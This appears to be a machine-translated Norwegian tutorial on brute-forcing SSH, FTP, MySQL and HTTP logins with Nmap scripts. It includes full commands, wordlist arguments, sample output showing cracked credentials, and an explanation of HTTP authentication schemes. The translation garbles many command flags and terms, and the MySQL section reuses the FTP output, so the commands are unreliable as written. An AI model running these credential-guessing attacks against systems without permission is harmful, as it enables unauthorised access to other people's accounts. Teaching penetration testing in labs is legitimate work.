Nmap

Passord Brute-tvang ved hjelp av Nmap

Passord Brute-tvang ved hjelp av Nmap
For å tøffe online-tjenester bruker folk vanligvis Hydra, Medusa og Metasploit Framework, men Nmap kan også brukes til å tøffe mange online-tjenester. Det er innebygde Nmap-skript som støtter FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP og andre forskjellige tjenester. Du kan også brute-force HTTP formbaserte, grunnleggende og fordøye autentiseringsmetoder. Hvis du har Nmap installert, kan du se disse skriptene i katalogen “/ usr / share / nmap / scripts”.

[e-postbeskyttet]: ~ $ sudo apt update && sudo apt upgrade
[e-postbeskyttet]: ~ $ sudo apt installere nmap -y
[e-postbeskyttet]: ~ $ cd / usr / share / nmap / scripts /
[e-postbeskyttet]: ~ $ ls * brute *

I denne opplæringen vil vi utforske hvordan vi kan bruke Nmap til et brute-force-angrep.

SSH Brute-Force

SSH er en sikker ekstern administrasjonsprotokoll og støtter openssl og passordbasert autentisering. For å styrke SSH-passordbasert autentisering, kan vi bruke “ssh-brute.nse ”Nmap-skript.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brute.nse

Send brukernavn og passordliste som argument til Nmap.

[e-postbeskyttet]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = brukere.txt, passdb = passord.tekst
Starter Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 17:09 PKT
Nmap-skanningsrapport for 192.168.43.181
Verten er oppe (0.00033s ventetid).
HAVNSTATSTJENESTE
22 / tcp åpen ssh
| ssh-brute:
| Kontoer:
| admin: p4ssw0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 60 sekunder, gjennomsnittlig tps: 1.7
Nmap ferdig: 1 IP-adresse (1 vert opp) skannet på 60.17 sekunder

FTP Brute-Force

FTP er en File Transfer Protocol som støtter passordbasert autentisering. For å brute-force FTP, bruker vi “ftp-brute.nse ”Nmap-skript.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-brute.nse

Gi brukernavn og passordliste som et argument til Nmap.

[e-postbeskyttet]: ~ $ nmap - script ftp-brute -p21 192.168.43.181 - script-args
userdb = brukere.txt, passdb = passord.tekst
Starter Nmap 7.70 (https: // nmap.org) kl 2020-02-08 16:51 PKT
Nmap-skanningsrapport for 192.168.43.181
Verten er oppe (0.00021s ventetid).
HAVNSTATSTJENESTE
21 / tcp åpen ftp
| ftp-brute:
| Kontoer:
| admin: p4ssw0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 20 sekunder, gjennomsnittlig tps: 5.0
Nmap ferdig: 1 IP-adresse (1 vert opp) skannet i 19.50 sekunder

MYSQL Brute-Force

Noen ganger blir MySQL åpent for eksterne tilkoblinger og tillater hvem som helst å koble til den. Passordet kan knekkes ved hjelp av Nmap med "mysql-brute" -skriptet.

[e-postbeskyttet]: ~ $ sudo nmap - skript mysql-brute -p3306 192.168.43.181
--script-args userdb = brukere.txt, passdb = passord.tekst
Starter Nmap 7.70 (https: // nmap.org) kl. 2020-02-08 16:51 PKT
Nmap-skanningsrapport for 192.168.43.181
Verten er oppe (0.00021s ventetid).
HAVNSTATSTJENESTE
3306 / tcp åpne mysql
| ftp-brute:
| Kontoer:
| admin: p4ssw0rd - Gyldig legitimasjon
| _ Statistikk: Utførte 99 gjetninger på 20 sekunder, gjennomsnittlig tps: 5.0
Nmap ferdig: 1 IP-adresse (1 vert opp) skannet i 19.40 sekunder

HTTP Brute-Force

HTTP bruker tre typer autentisering for å autentisere brukere til webservere. Disse metodene brukes i rutere, modemer og avanserte webapplikasjoner for å utveksle brukernavn og passord. Disse typene er:

Grunnleggende godkjenning

I grunnleggende HTTP-godkjenningsprotokoll koder nettleser brukernavn og passord med base64 og sender det under “Autorisasjon” -overskrift. Du kan se dette i følgende skjermbilde.

Autorisasjon: Grunnleggende YWRtaW46YWRtaW4 =

Du kan base64 dekode denne strengen for å se brukernavnet og passordet

[e-postbeskyttet]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
admin: admin

HTTP-grunnleggende autentisering er usikker fordi den sender både brukernavn og passord i ren tekst. Enhver Man-in-the-Middle Attacker kan enkelt fange opp trafikken og dekode strengen for å få passordet.

Fordøy autentisering

HTTP Digest Authentication bruker hashing-teknikker for å kryptere brukernavn og passord før det sendes til serveren.

Hash1 = MD5 (brukernavn: realm: passord)
Hash2 = MD5 (metode: digestURI)
respons = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Du kan se disse verdiene under overskriften "Autorisasjon".

Digestbasert autentisering er sikker fordi passord ikke sendes i ren tekst. Hvis en Man-in-the-Middle angriper avlytter trafikken, vil han ikke kunne få passordet for ren tekst.

Skjemabasert godkjenning

Grunnleggende og Digest-autentisering støtter bare overføring av brukernavn og passord mens skjemabasert autentisering kan tilpasses ut fra brukerens behov. Du kan lage din egen webside i HTML eller JavaScript for å bruke dine egne kodings- og overføringsteknikker.

Vanligvis blir data i formbasert autentisering sendt i ren tekst. Av sikkerhetshensyn må HTTP-er brukes for å forhindre Man-in-the-Middle-angrep.

Vi kan brute force alle typer HTTP-autentisering ved hjelp av Nmap. Vi bruker skriptet "http-brute" til det formålet.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-brute.nse

For å teste dette Nmap-skriptet, løser vi en offentlig vertlig brute-force-utfordring av pentester academy på denne URL-en http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Vi må oppgi alt inkludert vertsnavn, URI, forespørselsmetode og ordbøker hver for seg som et skriptargument.

[e-postbeskyttet]: ~ $ sudo nmap -p80 - script http-brute pentesteracademylab.appspot.com
--script-args http-brute.vertsnavn = pentesteracademylab.appspot.com,
http-brute.sti = / lab / webapp / basicauth, userdb = brukere.txt, passdb = passord.tekst,
http-brute.metode = POST
 
Starter Nmap 7.70 (https: // nmap.org) kl. 08.02.2020 21:37 PKT
Nmap scan rapport for pentesteracademylab.appspot.com (216.58.210.84)
Verten er oppe (0.20-talls latens).
Andre adresser for pentesteracademylab.appspot.com (ikke skannet): 2a00: 1450: 4018: 803 :: 2014
rDNS-rekord for 216.58.210.84: mct01s06-i-f84.1e100.nett
 
HAVNSTATSTJENESTE
80 / tcp åpen http
| http-brute:
| Kontoer:
| admin: aaddd - Gyldig legitimasjon
| _ Statistikk: Utførte 165 gjetninger på 29 sekunder, gjennomsnittlig tps: 5.3
Nmap ferdig: 1 IP-adresse (1 vert opp) skannet i 31.22 sekunder

Konklusjon

Nmap kan brukes til å gjøre mange ting til tross for bare enkel portskanning. Det kan erstatte Metasploit, Hydra, Medusa og mange andre verktøy laget spesielt for tvinging på nett. Nmap har enkle, brukervennlige innebygde skript som tvinger nesten alle tjenester, inkludert HTTP, TELNEL, SSH, MySQL, Samba og andre.

Hvordan utvikle et spill på Linux
For et tiår siden ville ikke mange Linux-brukere forutsi at deres favorittoperativsystem en dag ville være en populær spillplattform for kommersielle ...
Åpne kildeporter for kommersielle spillmotorer
Gratis, åpen kildekode og plattformspillmotorrekreasjoner kan brukes til å spille gamle så vel som noen av de ganske nylige spilletitlene. Denne artik...
Beste kommandolinjespill for Linux
Kommandolinjen er ikke bare din største allierte når du bruker Linux, den kan også være kilden til underholdning fordi du kan bruke den til å spille m...